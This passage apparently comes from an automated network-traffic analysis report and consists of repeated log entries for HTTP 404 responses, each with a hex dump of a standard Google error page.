3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 